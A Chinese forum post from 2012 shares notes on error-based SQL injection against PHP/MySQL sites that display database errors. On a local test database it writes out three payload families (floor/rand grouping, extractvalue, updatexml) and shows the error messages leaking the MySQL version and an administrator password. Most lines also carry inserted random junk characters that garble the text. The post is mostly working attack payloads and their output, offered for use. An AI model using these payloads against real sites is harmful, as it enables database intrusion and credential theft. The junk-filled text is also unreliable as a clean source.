放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。' w( ]8 }+ P) R1 d
实际测试环境:0 K! g( ^) a0 M$ r4 v
1 G' ]( Y; R, p" T& e
+ k$ t9 M7 a# V" \mysql> show tables;
! ^: S1 ]! d- e% y: ]+----------------+
% ^( }4 _, U4 F! ~| Tables_in_test |' S2 [9 z$ Z5 x# `
+----------------+9 }7 \- d# s7 d
| admin |7 i" B9 {4 C& ^6 S: y# n5 g
| article |+ Y/ F: N) e) z: H" R
+----------------+
k1 K# D- e7 |2 o
0 d1 k9 a$ G# b
1 K5 f& t/ c* u% A. [, t: H5 v# t9 Q4 ?
3 @8 |) N; k# t. H1 K/ Y4 smysql> describe admin;8 u; m+ @, k. H( v0 _
+-------+------------------+------+-----+---------+----------------+
t4 G" A6 l$ _/ R7 O! ?2 G9 J| Field | Type | Null | Key | Default | Extra |
4 t; j% y% U9 p: ^% f+-------+------------------+------+-----+---------+----------------+
& u* X. Z) g" j+ W) m/ X9 || id | int(10) unsigned | NO | PRI | NULL | auto_increment |- G% P9 A, c q c4 y8 s9 ^& u
| user | varchar(50) | NO | | NULL | |4 l2 Z6 |, ]4 B6 A- l
| pass | varchar(50) | NO | | NULL | |
5 S d0 Q9 `8 L9 i: \+-------+------------------+------+-----+---------+----------------+1 }7 c- {- q! I1 ~5 G& @9 y) A
- D7 x9 S; }2 H) V: p* v6 c7 @ $ v1 p4 A3 M, m1 T2 o. J
; f# J( }* n( r& ^' H
mysql> describe article;
: T, U' F# h+ K* T" ?1 o+---------+------------------+------+-----+---------+----------------+
, N/ [2 S" Y! f- K| Field | Type | Null | Key | Default | Extra |( N. ?8 Q6 {3 d. c
+---------+------------------+------+-----+---------+----------------+
4 u' ~8 }( i' ]% _5 V* q! H( t/ n| id | int(10) unsigned | NO | PRI | NULL | auto_increment |5 I9 u4 L- ^3 t* V3 Y1 f7 [
| title | varchar(50) | NO | | NULL | |6 \7 f$ X6 L$ @/ y' I$ C
| content | varchar(50) | NO | | NULL | | L- k+ H) K: n- @8 `. I
+---------+------------------+------+-----+---------+----------------+
) Z! [; ^8 _, }! O8 ^1、通过floor报错 Q( Q! n1 E: Q
可以通过如下一些利用代码! [' a; V* b6 B& N
. p B4 l- h# Y7 t; P9 Z
6 B I4 Z* t2 H" }
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' y2 a. D% X0 q. D/ wfrom information_schema.tables group by x)a);
4 e- t: X2 \) L/ a0 T' c* I/ j
4 Z3 }& D$ i. c- j
. J2 j; d5 N+ b, s2 C! iand (select count(*) from (select 1 union select null union select !1)x
9 P1 ?4 k; V) V) Ogroup by concat((select table_name from information_schema.tables limit 1),5 [7 c$ g+ [; h. S4 J
floor(rand(0)*2)));: P* ~4 d8 N! p' m8 ]7 ?2 S7 {
举例如下:6 C# \4 R! A X4 H6 i& P
首先进行正常查询:( V' ^: T8 ]% G4 A, q% ?1 i% Q6 Y
5 W* E- o t: ^( Q, [8 X1 ?mysql> select * from article where id = 1;
* U, L9 ]( u4 z) {' c+----+-------+---------+: Y A$ o) f" R: w/ \
| id | title | content |
+ F. m) i$ V6 v N- K+----+-------+---------+
( R) L( G( c. x J: f: T| 1 | test | do it |$ F3 C; I8 ?6 [% Y8 D! g Z
+----+-------+---------+
: I$ a3 a) X6 E3 I+ L7 {假如id输入存在注入的话,可以通过如下语句进行报错。
& ^- D3 x$ s& {6 Y! ]: L4 ?+ Z! [
; M F7 h! ~! q3 {
9 l- P+ S! u0 Z1 dmysql> select * from article where id = 1 and (select 1 from
5 D' h+ Y. b& I(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 `8 n# i0 I: Z" r! K
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'2 I# _' Q; o8 S
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 ]$ m* _- @& H( \/ F, X& j# S例如我们需要查询管理员用户名和密码:
* Q" Q$ @$ }7 b9 b( OMethod1:: e5 z0 i/ k# a
! G4 b b" ^0 s+ f' P' V+ u
3 M: h& k m' i5 t; d* |, qmysql> select * from article where id = 1 and (select 1 from
% X" R: w0 O2 q' g(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x7 l7 d% O. [8 e U" O# K, K! u# A
from information_schema.tables group by x)a);
5 }2 X4 R! q! w% d3 m! EERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'( H" a3 f0 @' [' v
Method2:
) @8 y8 o: e8 | * ^) I/ m( k e \6 g% _6 i3 Z
+ ^$ \( |+ f4 I* zmysql> select * from article where id = 1 and (select count(*)0 `; |+ D2 p* M( _9 o; K; O2 K
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
0 h+ X$ h4 B9 u8 t7 u, j# t5 ?floor(rand(0)*2)));. l r% d' V J6 m. n
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
: g6 _% l6 g+ _) [8 h5 b% N2、ExtractValue& z o! I: s ] H! H6 Y
测试语句如下
; T8 i3 D7 w, [1 X & Z7 H% f; b% Y ?# c
/ ]3 E2 [! l! l
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
, y, D; z' t( b0 S9 f4 E实际测试过程
( e: V2 e) [+ H0 P% t4 D ) ~" m F- g# o T
. k D2 P) c H8 C
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,2 ]# `* v* E, X/ S5 }% O" d
(select pass from admin limit 1)));--
, N1 z: z- j+ `ERROR 1105 (HY000): XPATH syntax error: '\admin888'
# _8 X# Y2 z/ Y, P4 M* k" {8 V3、UpdateXml
; }8 d1 l$ R/ q& U. I9 _测试语句
F @' h4 Q# T- J, P * g2 h; e; _4 _ e, E; F
* s- |5 b2 ]+ e, X8 Z/ H, wand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))9 l3 ?: S( w/ N: }! Z5 c0 H8 h4 S, S
实际测试过程
- K, q8 k; L5 H) P/ M ]* t4 O
2 ~( I! a, z2 B6 p# d
, ^" Y! M% N4 n3 z3 [( _& zmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,. B3 r- l, v/ s6 p5 e0 E& i! w! b
(select pass from admin limit 1),0x5e24),1));
/ x* Z5 W0 i" y5 VERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
$ v8 g! F; Z' s8 ~4 qAll, thanks foreign guys.
+ y' Q' b/ Q' E4 B$ M! C 7 h! f4 e$ f* o9 n. v Y e
2 C. C8 ~+ b( t |
发表于 2012-12-10 10:28:51
收藏
支持
反对